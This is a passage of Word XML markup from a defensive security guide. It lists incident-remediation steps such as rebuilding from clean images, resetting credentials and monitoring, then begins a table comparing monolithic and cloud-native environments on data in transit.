        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Rebuild from Trusted Code Images:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Do not attempt to selectively clean an infected operating system or container. Completely tear down compromised infrastructure components and redeploy the application using verified, clean CI/CD build images containing the newly patched code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C5EBBC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Execute a Mass Credential Reset:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Because the database may have been completely exposed or cracked offline, force a mandatory password reset for all users and administrative accounts across the entire application ecosystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F17579" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Implement Continuous Monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Deploy enhanced runtime protection and verbose logging on the newly restored endpoints to immediately flag any residual, copycat, or automated scanning attempts targeting the fixed vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E346531" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Context &amp; Variations (The Modern Landscape)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1AF885" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Environment Differences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BCD97C"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The fundamental mechanics of cryptographic operations shift dramatically depending on the architectural framework of the application, altering how vulnerabilities are exposed and mitigated.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="PlainTable1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1587"/>
        <w:gridCol w:w="4404"/>
        <w:gridCol w:w="3188"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="6612F167" w14:textId="77777777" w:rsidTr="00B064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F05BB7" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Security</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EFB4417" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Monolithic / On-Premise </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Applicatons</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="286FDA35" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Cloud-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Natve</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> / Serverless /</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Microservices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="7EA93998" w14:textId="77777777" w:rsidTr="00B064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C3E790" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Atack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> Surface</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>&amp; Data in</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Transit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="199775C7" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Data transit concerns are largely localized.</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">Internal </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>communicatons</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> between the</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>applicaton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> layer and a co-located database</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>ofen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> happen over localhost or a highly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="628E0D83" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Communicaton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> relies heavily</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>on HTTP/REST/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>gRPC</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> over</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>internal virtual networks. Data</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>in transit must be encrypted at</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D1388B6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="PlainTable1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1684"/>
        <w:gridCol w:w="4461"/>
        <w:gridCol w:w="3205"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="7A229F96" w14:textId="77777777" w:rsidTr="00B064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7077C6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Security</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42AFAF9C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Monolithic / On-Premise </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Applicatons</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68F0D4DA" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Cloud-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Natve</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> / Serverless /</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Microservices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="72AC7200" w14:textId="77777777" w:rsidTr="00B064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512904" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D9F4B1B" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>secured internal corporate network,</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">occasionally </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>temptng</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> teams to skip internal</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>encrypton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73111DAD" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
